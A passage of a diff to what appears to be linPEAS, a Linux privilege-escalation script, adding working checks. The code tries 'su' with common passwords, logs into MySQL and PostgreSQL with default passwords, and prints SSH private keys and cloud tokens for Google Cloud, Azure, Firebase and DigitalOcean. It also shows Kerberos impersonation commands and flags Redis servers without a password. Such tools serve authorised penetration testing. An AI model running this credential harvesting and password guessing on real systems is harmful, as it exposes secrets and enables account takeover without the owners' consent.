"$EXISTS_SUDO" ]; then +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC POSSIBE_SU_BRUTE=$(check_if_su_brute); if [ "$POSSIBE_SU_BRUTE" ]; then @@ -3021,7 +3340,7 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && printf $GREEN"It's not possible to brute-force su.\n\n"$NC fi else - print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC fi print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC @@ -3079,7 +3398,7 @@ if [ "$MACPEAS" ]; then done fi -#-- SI) Mysql version +#-- SI) MySQL version if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then print_2title "MySQL version" mysql --version 2>/dev/null || echo_not_found "mysql" @@ -3090,7 +3409,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; echo "" echo "" - #-- SI) Mysql connection root/root + #-- SI) MySQL connection root/root print_list "MySQL connection using default root/root ........... " mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) if [ "$mysqlconnect" ]; then @@ -3099,7 +3418,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; else echo_no fi - #-- SI) Mysql connection root/toor + #-- SI) MySQL connection root/toor print_list "MySQL connection using root/toor ................... " mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) if [ "$mysqlconnect" ]; then @@ -3108,7 +3427,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; else echo_no fi - #-- SI) Mysql connection root/NOPASS + #-- SI) MySQL connection root/NOPASS mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) print_list "MySQL connection using root/NOPASS ................. " if [ "$mysqlconnectnopass" ]; then @@ -3119,7 +3438,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; echo "" fi -#-- SI) Mysql credentials +#-- SI) MySQL credentials if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then print_2title "Searching mysql credentials and exec" printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do @@ -3163,9 +3482,9 @@ if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then done fi - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep -Ev '^lib_mysqludf_sys.so:$' | grep "lib_mysqludf_sys\.so") if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" + echo "Found $mysqlexec. $(whereis lib_mysqludf_sys.so)" echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," fi done @@ -3174,8 +3493,8 @@ echo "" if [ "$PSTORAGE_MARIADB" ] || [ "$DEBUG" ]; then print_2title "Analyzing MariaDB Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*" | sed -${E} "s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*,${SED_RED},g"; done; echo ""; fi @@ -3186,12 +3505,13 @@ if [ "$PSTORAGE_POSTGRESQL" ] || [ "$DEBUG" ]; then if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postgresql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin4\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin4.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin4\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgadmin4\.db$,${SED_RED},"; done; echo ""; fi #-- SI) PostgreSQL brute if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. -#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this +# Checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," else echo_no @@ -3375,7 +3695,8 @@ if [ "$PSTORAGE_SSH" ] || [ "$DEBUG" ]; then if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_rsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "known_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_keys"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_keys"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,command=.*,${SED_RED},g" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"\.pub$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pub"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "\.pub$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pub$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "command=.*" | sed -${E} "s,command=.*,${SED_RED},g"; done; echo ""; fi @@ -3388,7 +3709,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) # If there is tons of files linpeas gets frozen here without a timeout privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) fi else @@ -3461,7 +3782,7 @@ echo "" if [ "$PSTORAGE_PAM_AUTH" ] || [ "$DEBUG" ]; then print_2title "Analyzing PAM Auth Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i "auth" | grep -Ev "^#|^@" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|^@" | sed -${E} "s,auth|accessfile=|secret=|user,${SED_RED},g"; done; echo "";done; echo ""; fi @@ -3475,23 +3796,28 @@ fi if [ "$PSTORAGE_NFS_EXPORTS" ] || [ "$DEBUG" ]; then print_2title "Analyzing NFS Exports Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_NFS_EXPORTS\" | grep -E \"exports$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "exports"; fi; fi; printf "%s" "$PSTORAGE_NFS_EXPORTS" | grep -E "exports$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,exports$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,insecure,${SED_RED},g" | sed -${E} "s,no_root_squash|no_all_squash,${SED_RED_YELLOW},g"; done; echo ""; + nfsmounts=`cat /proc/mounts 2>/dev/null | grep nfs`; if [ "$nfsmounts" ]; then echo -e "Connected NFS Mounts: \n$nfsmounts"; fi + if ! [ "`echo \"$PSTORAGE_NFS_EXPORTS\" | grep -E \"exports$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "exports"; fi; fi; printf "%s" "$PSTORAGE_NFS_EXPORTS" | grep -E "exports$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,exports$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,insecure|rw|nohide,${SED_RED},g" | sed -${E} "s,no_root_squash|no_all_squash,${SED_RED_YELLOW},g"; done; echo ""; fi #-- SI) Kerberos kadmin_exists="$(command -v kadmin)" klist_exists="$(command -v klist)" -if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then +kinit_exists="$(command -v kinit)" +if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then print_2title "Searching kerberos conf files and tickets" print_info "http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory" if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi + if [ "$kinit_exists" ]; then echo "kadmin was found on $kinit_exists" | sed "s,$kinit_exists,${SED_RED},"; fi if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; fi + + (env || printenv) 2>/dev/null | grep -E "^KRB5" | sed -${E} "s,KRB5,${SED_RED},g" printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do if [ -r "$f" ]; then @@ -3505,8 +3831,8 @@ if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do if [ "$l" ] && echo "$l" | grep -q "@"; then printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" - #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid - #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + # kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + # We could also try to create a new user or modify a password, but I'm not user if linpeas should do that fi done elif echo "$f" | grep -q krb5.conf; then @@ -3533,6 +3859,14 @@ if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ fi +if [ "$PSTORAGE_FREEIPA" ] || [ "$DEBUG" ]; then + print_2title "Analyzing FreeIPA Files (limit 70)" + ipa_exists="$(command -v ipa)"; if [ "$ipa_exists" ]; then print_info "https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting"; fi + if ! [ "`echo \"$PSTORAGE_FREEIPA\" | grep -E \"ipa$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipa"; fi; fi; printf "%s" "$PSTORAGE_FREEIPA" | grep -E "ipa$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ipa$,${SED_RED},"; find "$f" -name "default.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,default.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_FREEIPA\" | grep -E \"dirsrv$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "dirsrv"; fi; fi; printf "%s" "$PSTORAGE_FREEIPA" | grep -E "dirsrv$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,dirsrv$,${SED_RED},"; find "$f" -name "id2rntry.db" | while read ff; do ls -ld "$ff" | sed -${E} "s,id2rntry.db,${SED_RED},"; done; echo "";done; echo ""; +fi + + if [ "$PSTORAGE_KNOCKD" ] || [ "$DEBUG" ]; then print_2title "Analyzing Knockd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*knockd*"; fi; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; @@ -3626,6 +3960,8 @@ fi if [ "$PSTORAGE_REDIS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Redis Files (limit 70)" + ( redis-server --version || echo_not_found "redis-server") 2>/dev/null + if [ "`redis-cli INFO 2>/dev/null`" ] && ! [ "`redis-cli INFO 2>/dev/null | grep -i NOAUTH`" ]; then echo "Redis isn't password protected" | sed -${E} "s,.*,${SED_RED},"; fi if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "redis.conf"; fi; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; fi @@ -3670,13 +4006,22 @@ if [ "$PSTORAGE_CLOUD_CREDENTIALS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Cloud Credentials Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"adc\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "adc.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "adc\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,adc\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.boto$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".boto"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.boto$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.boto$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.credentials\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".credentials.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.credentials\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.credentials\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"firebase-tools\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "firebase-tools.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "firebase-tools\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,firebase-tools\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,id_token.*|access_token.*|refresh_token.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.db"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access_tokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "accessTokens.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"gcloud$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gcloud"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "gcloud$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gcloud$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "b'authorization'.*" | sed -${E} "s,b'authorization'.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "legacy_credentials"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,legacy_credentials$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,refresh_token.*|client_secret,${SED_RED},g"; done; echo "";done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "azureProfile.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AzureRMContext.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"ErrorRecords$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ErrorRecords"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "ErrorRecords$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ErrorRecords$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bluemix"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.bluemix$,${SED_RED},"; find "$f" -name "config.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"doctl$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "doctl"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "doctl$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,doctl$,${SED_RED},"; find "$f" -name "config.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "access-token.*" | sed -${E} "s,access-token.*,${SED_RED},g"; done; echo "";done; echo ""; fi @@ -3746,7 +4091,7 @@ SPLUNK_BIN="$(command -v splunk 2>/dev/null)" if [ "$PSTORAGE_SPLUNK" ] || [ 